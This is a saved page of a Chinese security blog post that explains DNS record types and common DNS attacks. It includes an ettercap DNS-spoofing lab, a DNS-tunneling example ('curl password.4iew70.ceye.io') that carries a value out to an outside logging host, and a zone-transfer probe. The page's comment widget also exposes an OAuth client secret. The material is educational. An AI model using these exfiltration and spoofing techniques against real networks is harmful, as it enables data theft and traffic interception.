<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="v_OkIhl-1XjKYm3MZSJoivLgfqE3N9Snb2bj2c9YDrw" />













  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="DNS,DNS hijack,network protocol" />








  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico?v=5.1.2" />






<meta name="description" content="DNS(Domain Name System)域名系统作为互联网上最为重要的基础服务，由于其依赖的协议本身，同时也是最为脆弱的一环。常见对于DNS服务的攻击有:  DDoS DNS缓存投毒 中间人劫持  由DNS协议缺乏必要的认证机制，客户无法确认接收到的信息的真实性和权威性，基于名字的认证过程并不能起到真正的识别作用，而且接收到的应答报文中往往含有额外的附加信息，其正确性也无法判断。此外，DNS">
<meta name="keywords" content="DNS,DNS hijack,network protocol">
<meta property="og:type" content="article">
<meta property="og:title" content="DNS 协议 &amp; DNS 常见攻击">
<meta property="og:url" content="https://blog.nyrae.icu/blog/dns-hijack/index.html">
<meta property="og:site_name" content="empty_xl Blog">
<meta property="og:description" content="DNS(Domain Name System)域名系统作为互联网上最为重要的基础服务，由于其依赖的协议本身，同时也是最为脆弱的一环。常见对于DNS服务的攻击有:  DDoS DNS缓存投毒 中间人劫持  由DNS协议缺乏必要的认证机制，客户无法确认接收到的信息的真实性和权威性，基于名字的认证过程并不能起到真正的识别作用，而且接收到的应答报文中往往含有额外的附加信息，其正确性也无法判断。此外，DNS">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://blog.nyrae.icu/blog/dns-hijack/dns-spoof.png">
<meta property="og:image" content="https://blog.nyrae.icu/blog/dns-hijack/dns-hijack.png">
<meta property="og:image" content="https://blog.nyrae.icu/blog/dns-hijack/dns-query.png">
<meta property="og:updated_time" content="2021-08-24T13:28:39.918Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DNS 协议 &amp; DNS 常见攻击">
<meta name="twitter:description" content="DNS(Domain Name System)域名系统作为互联网上最为重要的基础服务，由于其依赖的协议本身，同时也是最为脆弱的一环。常见对于DNS服务的攻击有:  DDoS DNS缓存投毒 中间人劫持  由DNS协议缺乏必要的认证机制，客户无法确认接收到的信息的真实性和权威性，基于名字的认证过程并不能起到真正的识别作用，而且接收到的应答报文中往往含有额外的附加信息，其正确性也无法判断。此外，DNS">
<meta name="twitter:image" content="https://blog.nyrae.icu/blog/dns-hijack/dns-spoof.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: 'QT63IJTEZX',
      apiKey: '39726b4e0e80a502f3d0a45f494af02f',
      indexName: 'blog.nyrae.icu',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://blog.nyrae.icu/blog/dns-hijack/"/>





  <title>DNS 协议 & DNS 常见攻击 | empty_xl Blog</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-90390918-1', 'auto');
  ga('send', 'pageview');
</script>


  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?edc3c09a0382806fc3a47d6c11483da0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">empty_xl Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Hacked By_ emm myself?</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://blog.nyrae.icu/blog/dns-hijack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="empty_xl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="empty_xl Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">DNS 协议 & DNS 常见攻击</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-05-26T12:52:29+08:00">
                2018-05-26
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2021-08-24T21:28:39+08:00">
                2021-08-24
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/DNS/" itemprop="url" rel="index">
                    <span itemprop="name">DNS</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>DNS(Domain Name System)域名系统作为互联网上最为重要的基础服务，由于其依赖的协议本身，同时也是最为脆弱的一环。常见对于DNS服务的攻击有:</p>
<ol>
<li>DDoS</li>
<li>DNS缓存投毒</li>
<li>中间人劫持</li>
</ol>
<p>由DNS协议缺乏必要的认证机制，客户无法确认接收到的信息的真实性和权威性，基于名字的认证过程并不能起到真正的识别作用，而且接收到的应答报文中往往含有额外的附加信息，其正确性也无法判断。此外，DNS 的绝大部分通信使用 UDP，数据报文容易丢失，也易于受到劫持和欺骗。</p>
<a id="more"></a>
<h3 id="DNS协议"><a href="#DNS协议" class="headerlink" title="DNS协议"></a>DNS协议</h3>
<p>DNS 标准查询内容抓包如下，可以看到还是比较简单的，对于DNS的字段总结如下：</p>
<ul>
<li><p><code>A</code>记录  实现  <code>domain name =&gt; IP addr</code></p>
  <figure class="highlight nginx"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="attribute">nslookup</span> -querytype=a hellohxk.com</div><div class="line"></div><div class="line">Server:		<span class="number">202.117.112.3</span></div><div class="line">Address:	<span class="number">202.117.112.3</span><span class="comment">#53</span></div><div class="line"></div><div class="line">N<span class="literal">on</span>-authoritative answer:</div><div class="line">Name:	hellohxk.com</div><div class="line">Address: <span class="number">103.72.145.7</span></div><div class="line"></div><div class="line">N<span class="literal">on</span>-authoritative answer: 它的出现代表这个结果是从服务器的缓存中得到的，这不是一个授权的答案。</div></pre></td></tr></table></figure>
<p>  如果同一个域名指向多个A记录 每次返回的数据包含了两个IP地址，但是在返回的过程中数据排列的顺序每次都不相同。<br>  由于大部分的客户端只选择第一条记录所以通过这种方式可以实现一定程度的负载均衡。</p>
</li>
<li><p><code>MX</code>记录  实现 <code>Mail服务</code></p>
  <figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">nslookup -querytype=mx hellohxk<span class="selector-class">.com</span></div><div class="line"></div><div class="line">Server:		<span class="number">202.117</span>.<span class="number">112.3</span></div><div class="line">Address:	<span class="number">202.117</span>.<span class="number">112.3</span>#<span class="number">53</span></div><div class="line"></div><div class="line">Non-authoritative answer:</div><div class="line">hellohxk<span class="selector-class">.com</span>	mail exchanger = <span class="number">10</span> mxw<span class="selector-class">.mxhichina</span><span class="selector-class">.com</span>.</div><div class="line">hellohxk<span class="selector-class">.com</span>	mail exchanger = <span class="number">5</span> mxn<span class="selector-class">.mxhichina</span><span class="selector-class">.com</span>.</div></pre></td></tr></table></figure>
<p>  即在给<code>mail@xx.com</code>发邮件时，会去进行域名解析，查找<code>MX记录</code>。<br>  先找权重数最小的服务器（比如说是 10），如果能连通，那么就将服务器发送过去；如果无法连通 <code>mx</code>记录为<code>10</code> 的服务器，那么才将邮件发送到权重为<code>20</code>的 mail 服务器上。<br>  权重<code>20</code>的服务器在配置上只是暂时缓存mail ，当权重<code>20</code>的服务器能连通权重为<code>10</code>的服务器时，仍会将邮件发送的权重为<code>10</code>的 Mail 服务器上。当然，这个机制需要在 Mail 服务器上配置。</p>
</li>
<li><p><code>CNAME</code>记录 实现 <code>域名别称的作用</code></p>
  <figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">nslookup -querytype=cname www<span class="selector-class">.meishichina</span><span class="selector-class">.com</span></div><div class="line">Server:		<span class="number">202.117</span>.<span class="number">112.3</span></div><div class="line">Address:	<span class="number">202.117</span>.<span class="number">112.3</span>#<span class="number">53</span></div><div class="line"></div><div class="line">Non-authoritative answer:</div><div class="line">www<span class="selector-class">.meishichina</span><span class="selector-class">.com</span>	canonical name = www<span class="selector-class">.meishichina</span><span class="selector-class">.com</span><span class="selector-class">.w</span><span class="selector-class">.kunlunar</span><span class="selector-class">.com</span>.</div></pre></td></tr></table></figure>
<p>  当我们要指向很多的域名到一台电脑上的时候，用CNAME比较方便，这样查出来的不一定是真正的信息，比如<code>baidu</code>查出来就是<code>a.shifen.com</code>是baidu的安全外壳。</p>
</li>
<li><p><code>TXT</code>记录 实现 某条记录设置说明</p>
  <figure class="highlight ebnf"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="attribute">nslookup -qt</span>=txt example.com</div></pre></td></tr></table></figure>
<p>  如果设置了内容，就会看到结果</p>
</li>
<li><code>AAAA</code> 记录 指向 <code>IPv6地址</code></li>
<li><code>NS</code>记录 指向 用哪台DNS服务器进行解析</li>
<li><code>TTL值</code> 表示 解析记录在DNS服务器中的缓存时间, 利用这个值可以实现<code>DNS rebinding</code>，具体利用可以参考<a href="https://hellohxk.com/blog/ssrf/#DNS-Rebinding" target="_blank" rel="external">这里</a></li>
</ul>
<h3 id="常见DNS攻击-amp-利用"><a href="#常见DNS攻击-amp-利用" class="headerlink" title="常见DNS攻击&amp;利用"></a>常见DNS攻击&amp;利用</h3><h4 id="DNS-DDoS"><a href="#DNS-DDoS" class="headerlink" title="DNS DDoS"></a>DNS DDoS</h4><ol>
<li><p>DNS FLood</p>
<p> 向目标DNS服务器发送大量DNS查询请求，导致网络带宽耗尽而无法传送正常DNS查询请求</p>
</li>
<li><p>针对授权域服务器DRDoS</p>
<p> 发送大量非法域名查询报文引起DNS服务器持续进行迭代查询，从而达到较少的攻击流量消耗大量服务器资源的目的</p>
</li>
<li><p>DNS 反射</p>
<p> 由于DNS查询基于UDP协议，而UDP查询返回的内容是查询内容大小的10倍以上，所以构成了反射的条件，伪造DNS查询的ip地址，而由于一般主机不会过滤来自53端口发送的数据包，从而造成DNS反射攻击</p>
</li>
</ol>
<h4 id="DNS缓存污染"><a href="#DNS缓存污染" class="headerlink" title="DNS缓存污染"></a>DNS缓存污染</h4><p>首先介绍下常见系统/软件查看DNS缓存的方法:</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="selector-attr">[windows]</span></div><div class="line"><span class="selector-tag">ipconfig</span> /<span class="selector-tag">displaydns</span></div><div class="line"><span class="selector-attr">[chrome]</span></div><div class="line"><span class="selector-tag">chrome</span>:<span class="comment">//net-internals/#dns</span></div><div class="line"><span class="selector-attr">[linux]</span></div><div class="line">如果启用了<span class="selector-tag">nscd</span>或者<span class="selector-tag">BIND</span>才会有缓存</div><div class="line"><span class="selector-attr">[MAC]</span></div><div class="line"><span class="selector-tag">mDNSResponder</span></div></pre></td></tr></table></figure>
<blockquote>
<p>DNS 缓存污染指的是从权威域名服务器返回的 IP 地址在传递给最终用户的过程中被篡改了。由于查询结果要返回给最终用户需要经过很多系统，有很多地方都是可以篡改结果内容的，例如一台在你 ISP 范围内被动了手脚的路由器，一个通道中透明的 DNS 服务器，甚至可能是最终用户电脑上的病毒或木马</p>
</blockquote>
<p>最常见的长城防火墙中就使用了DNS 缓存污染，所有试图访问某些域名的DNS请求，一旦被发现，会伪造成DNS服务器向用户返回无效IP地址。</p>
<h4 id="DNS劫持"><a href="#DNS劫持" class="headerlink" title="DNS劫持"></a>DNS劫持</h4><p>攻击者监听DNS会话，猜测DNS服务器响应ID，抢先将虚假的响应提交给客户端</p>
<h4 id="DNS重定向"><a href="#DNS重定向" class="headerlink" title="DNS重定向"></a>DNS重定向</h4><p>将DNS名称查询重定向到恶意DNS服务器，可以从以下的例子中看出</p>
<h5 id="ettercap-DNS-spoof"><a href="#ettercap-DNS-spoof" class="headerlink" title="# ettercap DNS spoof"></a># ettercap DNS spoof</h5><p>可以使用<code>ettercap</code>进行简单的DNS欺骗实验，在kali 上开一个简单的web服务器，然后修改<code>etc/ettercap/etter.dns</code>文件，添加以下内容:</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">www</span><span class="selector-class">.qwer</span><span class="selector-class">.com</span> <span class="selector-tag">A</span> 192<span class="selector-class">.168</span><span class="selector-class">.1</span><span class="selector-class">.100</span></div></pre></td></tr></table></figure>
<p>选择一个不常用域名的原因是网卡的问题，网关的限制，还有DNS缓存等多种因素，劫持是并不一定可以生效，所以选择一个比较偏僻的域名，这样可以排除缓存干扰。<br><img src="/blog/dns-hijack/dns-spoof.png" alt="DNS Spoof" title="DNS Spoof"><br>在选择的插件中，开启<code>DNS Spoof</code>，在测试机中访问<code>www.qwer.com</code>,发现如下:<br><img src="/blog/dns-hijack/dns-hijack.png" alt="DNS Hijack" title="DNS Hijack"><br>发现成功访问了搭建的web服务器，说明劫持成功</p>
<h4 id="DNS隧道-DNS-Tunneling"><a href="#DNS隧道-DNS-Tunneling" class="headerlink" title="DNS隧道(DNS Tunneling)"></a>DNS隧道(DNS Tunneling)</h4><p>即利用DNS协议请求时，在请求报文上附带所传递的信息，最简单的我去对<code>payload.xxx.com</code>进行DNS解析，这时我的<code>xxx.com</code>的DNS解析服务器就能够收到一条Query，从而提取出payload内容。以<code>ceye.io</code>为例:</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">curl</span> <span class="selector-tag">password</span><span class="selector-class">.4iew70</span><span class="selector-class">.ceye</span><span class="selector-class">.io</span></div></pre></td></tr></table></figure>
<p>假设<code>curl</code>包被防火墙过滤了，但DNS请求没有被过滤，我们的服务器上就会收到<code>DNS Standard Query</code>，如下：</p>
<img src="/blog/dns-hijack/dns-query.png" alt="DNS Query" title="DNS Query">
<h4 id="DNS系统漏洞"><a href="#DNS系统漏洞" class="headerlink" title="DNS系统漏洞"></a>DNS系统漏洞</h4><blockquote>
<p>BIND(Berkeley Internet Name Domain)是最常用的DNS服务软件，具有广泛的使用基础，Internet上的绝大多数DNS服务器都是基于这个软件的。BIND提供高效服务的同时也存在着众多的安全性漏洞。，CNCERT/CC在2009年安全报告中指出：2009年7月底被披露的”Bind9″高危漏洞，影响波及全球数万台域名解析服务器，我国有数千台政府和重要信息系统部门、基础电信运营企业以及域名注册管理和服务机构的域名解析服务器受到影响。</p>
</blockquote>
<h4 id="DNS信息泄露"><a href="#DNS信息泄露" class="headerlink" title="DNS信息泄露"></a>DNS信息泄露</h4><p><code>DNS Zone Transfer</code>DNS域传送漏洞可以造成大量DNS子域名遭到泄露</p>
<p>DNS域传送，其利用的是DNS服务器的冗余设计造成的缺陷,即备用服务器使用来自主服务器的数据刷新自己的域数据库，防止服务器故障时无法提供解析服务。<br>一般来说，DNS区域传送操作只在网络里真的有备用域名DNS服务器时才有必要用到，但许多DNS服务器却被错误地配置成只要有client发出请求，就会向对方提供一个zone数据库的详细信息，所以说允许不受信任的因特网用户执行DNS区域传送.</p>
<p>例如使用以下命令可以检测是否存在DNS域传送漏洞：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">dig @ns4<span class="selector-class">.isp</span><span class="selector-class">.com</span> example<span class="selector-class">.com</span> axfr</div></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    empty_xl
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="https://blog.nyrae.icu/blog/dns-hijack/" title="DNS 协议 & DNS 常见攻击">https://blog.nyrae.icu/blog/dns-hijack/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="external nofollow" target="_blank">CC BY-NC-ND 4.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/DNS/" rel="tag"><i class="fa fa-tag"></i> DNS</a>
          
            <a href="/tags/DNS-hijack/" rel="tag"><i class="fa fa-tag"></i> DNS hijack</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/ssl/" rel="next" title="TLS/SSL流程详解 & HTTPS中间人攻击 & 流量分析SSL题目">
                <i class="fa fa-chevron-left"></i> TLS/SSL流程详解 & HTTPS中间人攻击 & 流量分析SSL题目
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/linux-wildcard/" rel="prev" title="Linux 通配符 绕过WAF">
                Linux 通配符 绕过WAF <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
    <link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
    <script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
    <script>
    var gitment = new Gitment({
      // 根据文章标题设置唯一评论id
    // id: '', // optional
    owner: 'emptyxl',
    repo: 'emptyxl.github.io',
    oauth: {
      client_id: 'fa7413e3c0207a96ae03',
      client_secret: 'a599fef18d25ba5c813d2e437260892e146462a2',
      }
    })
    gitment.render('comments')
    </script>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="empty_xl" />
          <p class="site-author-name" itemprop="name">empty_xl</p>
           
              <p class="site-description motion-element" itemprop="description">Hacked By_ EmPTy_xL../ security blog </p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">65</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">22</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">83</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/emptyxl" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      Github
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="/mail/index.html" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                    
                      E-Mail
                    
                </a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" class="cc-opacity" target="_blank">
              <img src="/images/cc-by-nc-nd.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS协议"><span class="nav-number">1.</span> <span class="nav-text">DNS协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#常见DNS攻击-amp-利用"><span class="nav-number">2.</span> <span class="nav-text">常见DNS攻击&利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS-DDoS"><span class="nav-number">2.1.</span> <span class="nav-text">DNS DDoS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS缓存污染"><span class="nav-number">2.2.</span> <span class="nav-text">DNS缓存污染</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS劫持"><span class="nav-number">2.3.</span> <span class="nav-text">DNS劫持</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS重定向"><span class="nav-number">2.4.</span> <span class="nav-text">DNS重定向</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#ettercap-DNS-spoof"><span class="nav-number">2.4.1.</span> <span class="nav-text"># ettercap DNS spoof</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS隧道-DNS-Tunneling"><span class="nav-number">2.5.</span> <span class="nav-text">DNS隧道(DNS Tunneling)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS系统漏洞"><span class="nav-number">2.6.</span> <span class="nav-text">DNS系统漏洞</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DNS信息泄露"><span class="nav-number">2.7.</span> <span class="nav-text">DNS信息泄露</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    
    &emsp;&emsp;|&emsp;
  </span>
  <span class="author" itemprop="copyrightHolder">empty_xl</span>
</div>


<div class="powered-by">
  
  Power &mdash; Hexo
</div>

<div class="theme-info">
  
  Theme &mdash; NexT.Mist
</div>
<div>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
